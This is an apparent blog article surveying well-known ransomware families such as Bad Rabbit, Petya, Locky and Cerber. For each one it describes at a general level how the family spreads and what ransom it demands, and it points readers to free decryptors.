Ensuring cybersecurity is becoming tougher every year as cybercriminals perform new attacks, exploit new vulnerabilities, and execute new attacks constantly. Cyber security is becoming an increasingly important issue for businesses, with the financial and reputational cost of data breaches which creates significant headaches for company owners.
One of the most dangerous forms of cybercrime is enterprise ransomware that has created headlines in every news in recent years. Ransomware has been a prominent threat to enterprises, SMBs, and individuals alike since the mid-2000s. This is a form of malware that infiltrates a computer system and then encrypts files to prevent the victim from accessing them. In order to unlock the files, they must do a payment to the attackers.
But there is not guarantee that the attackers seldom restore access even if they pay the ransom to attackers, which is why cybersecurity experts advise ransomware victims to do not satisfy attackers’ demands.
Let’s look at some of the most notable ransomware examples and the damage they did.
1) Bad Rabbit
Bad Rabbit is ransomware malicious software that infects a computer and restricts user access to the infected machine until a ransom is paid to unlock it. BadRabbit spreads via drive-by downloads on infected websites. In most cases of BadRabbit infections, visitors are tricked into clicking the malware by falsely alerting them that their Adobe Flash player requires an important update.
Once the victim’s computer is infected with BadRabbit ransomware and their data encrypted, the ransomware reboots the computer and a message with the title “Oops! Your files have been encrypted” is displayed after reboot.
When the Bad Rabbit was initially found in the wild, it targeted mainly users in Russia. Relatedly, attacks were reported in other countries namely Ukraine, Turkey, and Germany.
GoldenEye is a combination of Petya and MISCHA ransomware-type viruses. Unlike most ransomware, the new GoldenEye variant has two layers of encryption: one that individually encrypts target files on the computer and another one that encrypts NTFS structures. This approach prevents victims’ computers from being booted up in a live OS environment and retrieving stored information or samples.
Just like Petya, GoldenEye encrypts the entire hard disk drive and denies the user access to the computer. However, unlike Petya, there is no workaround to help victims retrieve the decryption keys from the computer.
Additionally, after the encryption process is complete, the ransomware has a specialized routine that forcefully crashes the computer to trigger a reboot that renders the computer unusable until the $300 ransom is paid. Companies and government institutions are among the affected entities.
Jigsaw ransomware is a notorious crypto virus which encrypts important victim’s information with an AES cipher. It was designed to be spread through malicious attachments in spam emails. Jigsaw is activated if a user downloads the malware programm which will encrypt all user files and master boot record.
The size of ransom is equivalent to $150 and must be paid in Bitcoins within 24 hours following infection. The ransomware window contains a 60-minute timer, which indicates time remaining until next file deletion. Initially, this ransomware deletes one file, however, after each 60-minute period has elapsed, the number of files targeted for deletion increases.
In addition, when the victim restarts the computer or re-executes this ransomware, it deletes a further 1000 files. According to the message, all files will be deleted within 72 hours.
It is possible to decrypt this ransomware for free.Â Demonslay335 has released a decryptor that can decrypt files encrypted by the Jigsaw Ransomware. Therefore, there is no need to pay the ransom. It is, however, unlikely that users will be able to restore files affected by ransomware-type viruses without the private key. In this case, you should restore your system and/or files from a backup.
ZCryptor targets Windows OS and exhibits worm-like behavior, which means that it is capable of copying itself, even to removable drives (USB sticks/flash drives, SD cards). Initial attack vectors include spam email campaigns, macro malware, and fake Adobe Flash installers.
Once the computer is infected by ZCryptor, it drops an autorun.inf file on removable drives, which allows it to infect the computers these drives are plugged into. Microsoft researchers explain that the malware also leverages network drives to propagate itself, and it also drops copies of itself in different locations and changes the file attributes to hide itself from the user in file explorer.
Once the files are encrypted a ransom note appears demanding 1.2 bitcoins, around $500, for the decryption key. It gives the victim four days to comply and then increases the payment to five Bitcoins ($2,200)
Petya is a ransomware strain that infects Microsoft Windows-based computers. Like other forms of ransomware, Petya encrypts data on infected systems. This malware infects the master boot record to execute a payload that encrypts a hard drive’s file system table and prevents Windows from booting.
The ransomware takes over computers and demands $300, paid in Bitcoin. The malicious software spreads rapidly across an organization once a computer is infected using the EternalBlue vulnerability in Microsoft Windows or through two Windows administrative tools. The malware tries one option and if it doesn’t work, it tries the next one. Variants of Petya were first seen in March 2016, which propagated via infected email attachments.
GandCrab is a ransomware-as-a-service variant type malware that encrypts victims’ files and demands ransom payment in order to regain access to their data. It targets consumers and businesses with PCs running Microsoft Windows.
GandCrab is distributed via spam emails, exploit kits and other affiliated malware campaigns. In announcements by both Bitdefender and Europol, a decryptor for the GandCrab Ransomware was released that decrypts the latest versions of the ransomware. You can download and follow the steps which are described in this article of Bitdefender to decrypt the files affected by GrandCrab.
SamSam ransomware is a type of malware whose objective is to get into a targeted system like industries including some within critical infrastructure. The cybercriminals exploit Windows servers to gain persistent access to a victim’s network. When the cybercriminal feels that the data collected is sufficient, they gain privileges for administrator rights, drop malware into the server. Hence, the victim will most probably go by unnoticed.
After the attack process begins, the malware begins to encrypt all documents and files on all systems it can find on the network. It is at this point that the malware becomes ransomware. You must send 0.8 bitcoin to receive the decryption key. After running it on your affected PC and all encrypted files will be recovered.
Locky is a type of malware that can encrypt important files on your computer and requires you to pay a fee to decrypt the files. It is ransomware distributed via malicious document files attached to spam email messages.
After you open the attached document, it will open a prompt saying “Enable macro if data encoding is incorrect.” If you do so, the macro runs code that downloads and saves the Locky ransomware to your system and starts to encrypt files that may include Office files, videos and images. To get your files back, Locky ransomware file advises you to visit their website by installing tor browser where you will receive further instructions for making payment of 0.5 bitcoin.
Cerber is a ransomware application that uses a ransomware-as-a-service (RaaS) model where affiliates purchase and then spread the malware. Commissions are paid to the developers for using the malware. Once the malware is installed on your PC, it will create a random named executable in App Data.
As soon as the malware starts to execute, it will scan all drives to encrypt the files. Cerber will first check to see which country a victim is from. If the infected computer is from any of the following countries Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, Uzbekistan, it will terminate itself and not encrypt the computer.
If the computer is from any other country, Cerber Ransomware adds the extension .cerber to every file that the Cerber Ransomware encrypts. After the Cerber Ransomware has encrypted some of the files of the victim, the Cerber Ransomware demands the payment of a ransom in exchange for the decryption key. Hackers drop a ransom note and ask users to pay a ransom of 1.24 BTC to get a decryption key.
DID YOU ENJOY THIS TUTORIAL? PLEASE LIKE AND SHARE THIS POST WITH YOUR FRIENDS AND COLLEAGUES. IT WILL HELP AND MOTIVATE US TO POST ARTICLES WITH QUALITY CONTENT.